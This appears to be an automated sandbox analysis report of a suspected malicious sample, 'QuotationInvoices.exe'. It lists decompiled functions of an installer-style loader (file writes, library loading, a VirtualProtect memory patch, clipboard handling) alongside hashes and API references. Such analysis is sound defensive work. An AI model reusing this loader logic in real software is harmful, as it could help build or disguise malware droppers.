Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID: IDFromString
API String ID: 2738559852-906310873
Opcode ID: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
Instruction ID: 7c3f96e10be73f403a44b868b48459b61dea37020128cbb38d3373314b5f95ad
Opcode Fuzzy Hash: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
Instruction Fuzzy Hash: 79E0B63221465AAFDF509F95DC00AEB7B6CEB15260F004836BE59E2190D631EA21DAE8

Uniqueness

Uniqueness Score: -1.00%

Function 00405E8D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E8D(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e91
0x00405ea1
0x00405ea9
0x00000000
0x00405eb0
0x00000000
0x00405eb2

APIs

WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,00415BE3,IDFromString,004033BF,IDFromString,00415BE3,0040B8A0,0041D460,00004000,?,00000000,004031E9), ref: 00405EA1

Strings

IDFromString, xrefs: 00405E8D

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite
String ID: IDFromString
API String ID: 3934441357-906310873
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 65ef4e0bd98581bd1f6bd632b42787c8420692956f3b06be75fa4a484c2a9a78
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: FFE08C3220125AABEF119F60CC00AEB3B6CFB04361F004433FAA4E3140E230E9208BE4

Uniqueness

Uniqueness Score: -1.00%

Function 004031B7, Relevance: 3.1, APIs: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004031B7(void* __ecx, long _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42f4b8;
					 *0x429464 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E004032BF(4);
				if(_t22 >= 0) {
					_t24 = E00405E5E( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x429464 =  *0x429464 + 4;
						_t36 = E004032BF(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x429464 =  *0x429464 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E00405E5E( *0x40a01c, 0x41d460, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E00405E8D(_a8, 0x41d460, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x429464 =  *0x429464 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}

0x004031bb
0x004031c4
0x004031cd
0x004031d1
0x004031dc
0x004031dc
0x004031e4
0x004031eb
0x004031fd
0x00403204
0x004032a9
0x004032a9
0x00000000
0x0040320a
0x0040320d
0x00403219
0x0040321d
0x004032b7
0x004032b7
0x00403223
0x00403226
0x00403285
0x0040328b
0x0040328d
0x0040328d
0x0040329f
0x004032a7
0x004032ae
0x004032b1
0x00000000
0x00000000
0x00000000
0x00000000
0x00403228
0x0040322b
0x00000000
0x00403231
0x00403236
0x0040323d
0x00403240
0x00403242
0x00403242
0x0040324f
0x00403252
0x00403259
0x00000000
0x00000000
0x00403262
0x00403269
0x00403281
0x004032ab
0x004032ab
0x0040326b
0x0040326b
0x0040326e
0x00403271
0x00403277
0x0040327d
0x00000000
0x0040327f
0x00000000
0x0040327f
0x0040327d
0x00000000
0x00403269
0x00000000
0x00403236
0x0040322b
0x00403226
0x0040321d
0x00403204
0x004032b9
0x004032bc

APIs

SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 004031DC

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: c5bf3f2a7834a57ab6379b74590a1aae870d7d7a6e9b7999044e5077526538b5
Instruction ID: f7a06b24e1bdd84e59f3f5cc49a67b6726d22d07d12c3136825aaea33ef0281b
Opcode Fuzzy Hash: c5bf3f2a7834a57ab6379b74590a1aae870d7d7a6e9b7999044e5077526538b5
Instruction Fuzzy Hash: 91318D70200218EFDB109F95DD44A9A3BACEB04759F1044BEF905E61A0D3389E51DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42f490;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42ec2c =  *0x42ec2c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec2c, 0x7530,  *0x42ec14), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
Instruction ID: 4ffa91c62993149d5f3561e9fd219417dede2ec5d116c30815b8555db40bf4f7
Opcode Fuzzy Hash: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
Instruction Fuzzy Hash: 480121317242109BE7184B7A8D04B6A32A8E710318F10853AF841F61F1DA789C028B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00406656, Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406656(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a258);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
				}
				_t5 = E004065E8(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x0040665e
0x00406661
0x00406668
0x00406670
0x0040667c
0x00000000
0x00406683
0x00406673
0x0040667a
0x00000000
0x0040668b
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
GetProcAddress.KERNEL32(00000000,?), ref: 00406683

Part of subcall function 004065E8: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065FF
Part of subcall function 004065E8: wsprintfA.USER32 ref: 00406638
Part of subcall function 004065E8: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
Instruction ID: a5acf963d4dc7277efada4342fe0793da34265ba7e3dd7efcecf40f1b2e2af73
Opcode Fuzzy Hash: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
Instruction Fuzzy Hash: 48E086326042106AD6106B705E0497773A89F847103034D3EF94AF2140D739DC31966D

Uniqueness

Uniqueness Score: -1.00%

Function 00405DE6, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405DE6(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405dea
0x00405df7
0x00405e0c
0x00405e12

APIs

GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\QuotationInvoices.exe,80000000,00000003), ref: 00405DEA
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
Instruction ID: c1cd633b288b309c16b37b55694bd397a2d2f3fd27c3ea135bedd35eac3c4d3c
Opcode Fuzzy Hash: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
Instruction Fuzzy Hash: D9D09E31254602AFEF0D8F20DE16F2E7AA2EB84B00F11952CB682944E2DA715819AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00405DC1, Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DC1(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405dc6
0x00405dcc
0x00405dd1
0x00405dda
0x00405dda
0x00405de3

APIs

GetFileAttributesA.KERNELBASE(?,?,004059D9,?,?,00000000,00405BBC,?,?,?,?), ref: 00405DC6
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DDA

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
Instruction ID: cf7f7f764d64860b039e5252603fd5f93999e207008e06c25ada038bd68c9de4
Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
Instruction Fuzzy Hash: 16D0C976504421AFC2112728AE0C89BBB55DB542B1702CA36FDA5A26B2DB304C569A98

Uniqueness

Uniqueness Score: -1.00%

Function 004058B7, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058B7(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x004058bd
0x004058c5
0x00000000
0x004058cb
0x00000000

APIs

CreateDirectoryA.KERNELBASE(?,00000000,00403479,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004058BD
GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058CB

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
Instruction ID: 533fd4e2b3ea02dfd4e86ffada44851bb532735a7b96714f173b1300ab50f423
Opcode Fuzzy Hash: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
Instruction Fuzzy Hash: 53C04C31214A019BE6506B319F09B177BA4AF50741F118439678AF01A1DB34846ADA6D

Uniqueness

Uniqueness Score: -1.00%

Function 6FC52921, Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x6fc54038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x6fc5404c, 4, 0x40, 0x6fc5403c); // executed
					 *0x6fc5404c = 0xc2;
					 *0x6fc5403c = 0;
					 *0x6fc54044 = 0;
					 *0x6fc54058 = 0;
					 *0x6fc54048 = 0;
					 *0x6fc54040 = 0;
					 *0x6fc54050 = 0;
					 *0x6fc5404e = 0;
				}
				return 1;
			}

0x6fc5292a
0x6fc5292f
0x6fc5293f
0x6fc52947
0x6fc5294e
0x6fc52953
0x6fc52958
0x6fc5295d
0x6fc52962
0x6fc52967
0x6fc5296c
0x6fc5296c
0x6fc52974

APIs

VirtualProtect.KERNELBASE(6FC5404C,00000004,00000040,6FC5403C), ref: 6FC5293F

Memory Dump Source

Source File: 00000000.00000002.667341894.000000006FC51000.00000020.00020000.sdmp, Offset: 6FC50000, based on PE: true

Associated: 00000000.00000002.667322660.000000006FC50000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667363580.000000006FC53000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667372496.000000006FC55000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d907a6087abaf5f4dda6c163c704bbe976ec8c3422cc869de58207a4f4e87baf
Instruction ID: f29bc23ccefd4b34b1e29b21d1dff8dec57995cb899928d7694240660cb3fd57
Opcode Fuzzy Hash: d907a6087abaf5f4dda6c163c704bbe976ec8c3422cc869de58207a4f4e87baf
Instruction Fuzzy Hash: 25F092B1508B82DECB60CF6884A47063EF1B79A374B31452AE358E6241E334407C8B15

Uniqueness

Uniqueness Score: -1.00%

Function 0040343E, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040343E(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x0040344c
0x00403452

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004054B2, Relevance: 54.3, APIs: 36, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E004054B2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42ec24; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405446, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E004062E0(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x42a8b8;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ec0c - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42f448, 8);
							__eflags =  *0x42f4ec - _t150;
							if( *0x42f4ec == _t150) {
								E00405374( *((intOrPtr*)( *0x42a090 + 0x34)), _t150);
							}
							E004042AA(1);
							goto L25;
						}
						 *0x429c88 = 2;
						E004042AA(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404338(_t157, _a12, _a16);
						}
						ShowWindow( *0x42ec10, _t150);
						ShowWindow(_v8, 8);
						E00404306(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42f454;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42ec10 = GetDlgItem(_a4, 0x403);
				 *0x42ec08 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42ec24 = _t128;
				_v8 = _t128;
				E00404306( *0x42ec10);
				 *0x42ec14 = E00404BF7(4);
				 *0x42ec2c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004042D1(_a4);
				if(( *0x42f45c & 0x00000003) != 0) {
					ShowWindow( *0x42ec10, _t150);
					if(( *0x42f45c & 0x00000002) != 0) {
						 *0x42ec10 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404306( *0x42ec08);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42f45c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}

0x004054b8
0x004054c0
0x004054c3
0x004054cb
0x004054ce
0x0040565d
0x00405663
0x00405687
0x00405687
0x00405693
0x00405699
0x004056bb
0x004056bb
0x004056c1
0x00405716
0x00405716
0x00405719
0x00000000
0x00000000
0x0040571b
0x0040571e
0x00405721
0x00000000
0x00000000
0x0040572b
0x00405731
0x00405733
0x00405736
0x00405833
0x00000000
0x00405833
0x00405745
0x00405751
0x0040575a
0x00405761
0x00405765
0x00405768
0x00405771
0x00405777
0x0040577a
0x0040577a
0x0040578a
0x00405790
0x00405793
0x0040579e
0x0040579e
0x0040579f
0x004057a2
0x004057a9
0x004057b0
0x004057b8
0x004057b8
0x004057c6
0x004057cc
0x004057cf
0x004057cf
0x004057d6
0x004057dc
0x004057e5
0x004057ec
0x004057f5
0x004057f7
0x004057fa
0x00405809
0x0040580b
0x0040580e
0x0040580f
0x00405812
0x00405813
0x00405814
0x00405814
0x0040581c
0x00405827
0x0040582d
0x0040582d
0x00000000
0x00405793
0x004056c3
0x004056c9
0x004056f7
0x004056f9
0x004056ff
0x0040570a
0x0040570a
0x00405711
0x00000000
0x00405711
0x004056cd
0x004056d7
0x00000000
0x0040569b
0x0040569b
0x004056a1
0x004056dc
0x00000000
0x004056e3
0x004056aa
0x004056b1
0x004056b6
0x00000000
0x004056b6
0x00405699
0x004054d4
0x004054d8
0x004054e0
0x004054e4
0x004054e7
0x004054ea
0x004054ed
0x004054f0
0x004054f1
0x004054f2
0x0040550b
0x0040550e
0x00405518
0x00405527
0x0040552f
0x00405537
0x0040553c
0x0040553f
0x0040554b
0x00405554
0x0040555d
0x0040557f
0x00405585
0x00405596
0x0040559b
0x004055a9
0x004055b7
0x004055b7
0x004055bc
0x004055ca
0x004055ca
0x004055cf
0x004055d2
0x004055d7
0x004055e3
0x004055ec
0x004055f9
0x00405608
0x004055fb
0x00405600
0x00405600
0x00405614
0x00405614
0x00405628
0x00405631
0x0040563a
0x0040564a
0x00405656
0x00405656
0x00000000

APIs

GetDlgItem.USER32 ref: 00405511
GetDlgItem.USER32 ref: 00405520
GetClientRect.USER32 ref: 0040555D
GetSystemMetrics.USER32 ref: 00405564
SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405585
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405596
SendMessageA.USER32(?,00001001,00000000,?), ref: 004055A9
SendMessageA.USER32(?,00001026,00000000,?), ref: 004055B7
SendMessageA.USER32(?,00001024,00000000,?), ref: 004055CA
ShowWindow.USER32(00000000,?,0000001B,?), ref: 004055EC
ShowWindow.USER32(?,00000008), ref: 00405600
GetDlgItem.USER32 ref: 00405621
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405631
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040564A
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405656
GetDlgItem.USER32 ref: 0040552F

Part of subcall function 00404306: SendMessageA.USER32(00000028,?,00000001,00404136), ref: 00404314

GetDlgItem.USER32 ref: 00405672
